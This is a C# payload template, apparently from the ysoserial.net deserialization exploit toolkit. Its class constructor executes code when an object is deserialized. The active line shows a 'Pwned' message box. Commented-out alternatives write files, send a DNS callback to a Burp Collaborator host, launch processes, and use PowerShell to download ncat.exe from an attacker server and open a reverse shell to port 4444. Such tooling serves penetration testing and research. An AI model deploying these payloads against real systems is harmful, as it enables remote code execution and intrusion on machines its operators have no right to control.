﻿// ExploitClass was renamed to E to reduce the size a little bit
class E
{
    public E()
    {
        //try
        //{
        /* Payload code to be executed. Examples: */


        /* Showing a message box: -c "ExploitClass.cs;./dlls/System.Windows.Forms.dll" */
        System.Windows.Forms.MessageBox.Show("Pwned", "Pwned", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);


        /* Creating a text file: -c "ExploitClass.cs;./dlls/System.dll"  */
        /*
        using (System.IO.StreamWriter outputFile = new System.IO.StreamWriter(@"C:\windows\temp\test.txt"))
        {
            outputFile.WriteLine("testme");
        }
        //*/


        /* Making a DNS request for PoC (System.dll needs to be in the dlls folder): -c "ExploitClass.cs;./dlls/System.dll" */
        //System.Net.Dns.Resolve("8z89j28ubxz878iktsny9abwyn4ds2.burpcollaborator.net");


        /* Running a command: -c "ExploitClass.cs;./dlls/System.dll"  */
        //System.Diagnostics.Process.Start("cmd.exe", "/c calc");
        //System.Diagnostics.Process.Start("powershell.exe", "-Command \"(New-Object Net.WebClient).DownloadFile(\\\"http://AttackerServer/ncat.exe\\\", \\\"c:\\windows\\temp\\ncat.exe\\\")\"");// & c:\\windows\\temp\\ncat.exe -nv AttackerServerIP 4444 -e powershell.exe");


        /* Causing a delay */
        //System.Threading.Thread.Sleep(10000); // waits for 10 seconds

        /*For web pentesting*/
        /*
        System.Web.HttpContext.Current.Response.AddHeader("X-YSOSERIAL-NET","HERE");
        System.Web.HttpContext.Current.Response.Cookies.Add(new System.Web.HttpCookie("X-YSOSERIAL-NET", "HERE"));
        System.Web.HttpContext.Current.Response.End();
        */
        //}
        //catch (Exception)
        //{
        //}
    }
}
